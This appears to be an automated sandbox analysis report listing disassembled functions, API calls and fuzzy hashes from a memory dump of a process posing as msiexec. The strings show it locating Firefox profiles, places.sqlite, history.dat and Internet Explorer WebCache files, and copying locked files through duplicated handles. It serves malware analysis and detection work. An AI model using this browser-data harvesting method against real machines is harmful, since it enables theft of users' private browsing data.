                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLastfree
                                                              • String ID: |A
                                                              • API String ID: 981974120-1717621600
                                                              • Opcode ID: 1f69d99746321e8208190a986702b24ea6c54e93cf13cd9150f3c44d2239699d
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: 1f69d99746321e8208190a986702b24ea6c54e93cf13cd9150f3c44d2239699d
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                              Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$wcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 2489821370-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 1579243037-1578091866
                                                              • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                              • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                              • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                              Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0040E60F
                                                              • memset.MSVCRT ref: 0040E629
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                              • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                              • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                              • API String ID: 3354267031-2114579845
                                                              • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                              • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                              • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                              Function 0043A9F6 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 979COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: only a single result allowed for a SELECT that is part of an expression
                                                              • API String ID: 2221118986-1725073988
                                                              • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                              • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                              • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                              Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$memcmp
                                                              • String ID: $$8
                                                              • API String ID: 2808797137-435121686
                                                              • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                              • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                              • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                              Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                              • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                              • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                              • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                              • String ID:
                                                              • API String ID: 1979745280-0
                                                              • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                              • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                              • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                              Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                              • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                              • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                              • free.MSVCRT ref: 00418803
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                              • String ID:
                                                              • API String ID: 1355100292-0
                                                              • Opcode ID: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                              • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                              • Opcode Fuzzy Hash: 5668d0b7c5c9ca58d6e5ee57346aa2e448fecd31d747e20cfbee9aabcf780e2b
                                                              • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                              Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                              • memset.MSVCRT ref: 00414C87
                                                              • wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProcVersionmemsetwcscpy
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 4182280571-2036018995
                                                              • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                              • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                              • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                              Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                              • memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                              • String ID: history.dat$places.sqlite
                                                              • API String ID: 2641622041-467022611
                                                              • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                              • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                              • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                              Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                              • GetLastError.KERNEL32 ref: 00417627
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
